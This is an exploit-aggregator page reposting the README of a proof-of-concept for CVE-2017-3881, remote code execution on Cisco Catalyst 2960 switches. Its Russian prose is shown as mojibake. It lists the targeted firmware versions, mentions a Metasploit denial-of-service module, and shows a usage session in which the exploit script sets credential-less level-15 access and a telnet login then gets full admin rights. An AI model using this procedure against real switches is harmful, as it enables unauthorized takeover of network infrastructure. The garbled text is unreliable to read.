Sploitus

Exploit for cisco-rce

kitploit Β· 2026-08-25

Exploit Code

MARKDOWN38 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ARTKOND-CISCO-RCE
# CVE-2017-3881 Π£Π΄Π°Π»Π΅Π½Π½ΠΎΠ΅ Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ ΠΊΠΎΠ΄Π° Π² Cisco IOS

Π­Ρ‚ΠΎΡ‚ Ρ€Π΅ΠΏΠΎΠ·ΠΈΡ‚ΠΎΡ€ΠΈΠΉ содСрТит ΠΊΠΎΠ΄ Proof-Of-Concept для эксплуатации уязвимости ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎΠ³ΠΎ выполнСния ΠΊΠΎΠ΄Π°, раскрытой ΠΊΠΎΠΌΠΏΠ°Π½ΠΈΠ΅ΠΉ Cisco Systems 17 ΠΌΠ°Ρ€Ρ‚Π° 2017 Π³ΠΎΠ΄Π° - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp

## ОписаниС

ОписаниС эксплуатации доступно здСсь - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/

Код эксплойта RCE доступСн для ΠΊΠΎΠΌΠΌΡƒΡ‚Π°Ρ‚ΠΎΡ€Π° Cisco Catalyst 2960. Π­Ρ‚ΠΎΡ‚ эксплойт зависит ΠΎΡ‚ ΠΏΡ€ΠΎΡˆΠΈΠ²ΠΊΠΈ. ΠŸΠΎΠ΄Π΄Π΅Ρ€ΠΆΠΈΠ²Π°ΡŽΡ‚ΡΡ Π΄Π²Π΅ вСрсии ΠΏΡ€ΠΎΡˆΠΈΠ²ΠΊΠΈ:

  * 12.2(55)SE1 C2960-LANBASEK9-M

  * 12.2(55)SE11 C2960-LANBASEK9-M




Код ΠΎΡ‚ΠΊΠ°Π·Π° Π² обслуТивании доступСн Π² Π²ΠΈΠ΄Π΅ модуля Ruby для Metasploit. Он Π΄ΠΎΠ»ΠΆΠ΅Π½ Ρ€Π°Π±ΠΎΡ‚Π°Ρ‚ΡŒ для Π±ΠΎΠ»ΡŒΡˆΠΈΠ½ΡΡ‚Π²Π° ΠΊΠΎΠΌΠΌΡƒΡ‚Π°Ρ‚ΠΎΡ€ΠΎΠ², упомянутых Π² ΡƒΠ²Π΅Π΄ΠΎΠΌΠ»Π΅Π½ΠΈΠΈ Cisco (трСбуСтся ΠΏΠΎΠ΄Ρ‚Π²Π΅Ρ€ΠΆΠ΄Π΅Π½ΠΈΠ΅).

## ΠŸΡ€ΠΈΠΌΠ΅Ρ€ использования

root@kitploit:~
    
    
    $ python c2960-lanbasek9-m-12.2.55.se11 192.168.88.10 --set
    [+] Connection OK
    [+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f'
    [+] Sending cluster option
    [+] Setting credless privilege 15 authentication
    [+] All done
    $ telnet 192.168.88.10
    Trying 192.168.88.10...
    Connected to 192.168.88.10.
    Escape character is '^]'.
    
    catalyst1#show priv
    Current privilege level is 15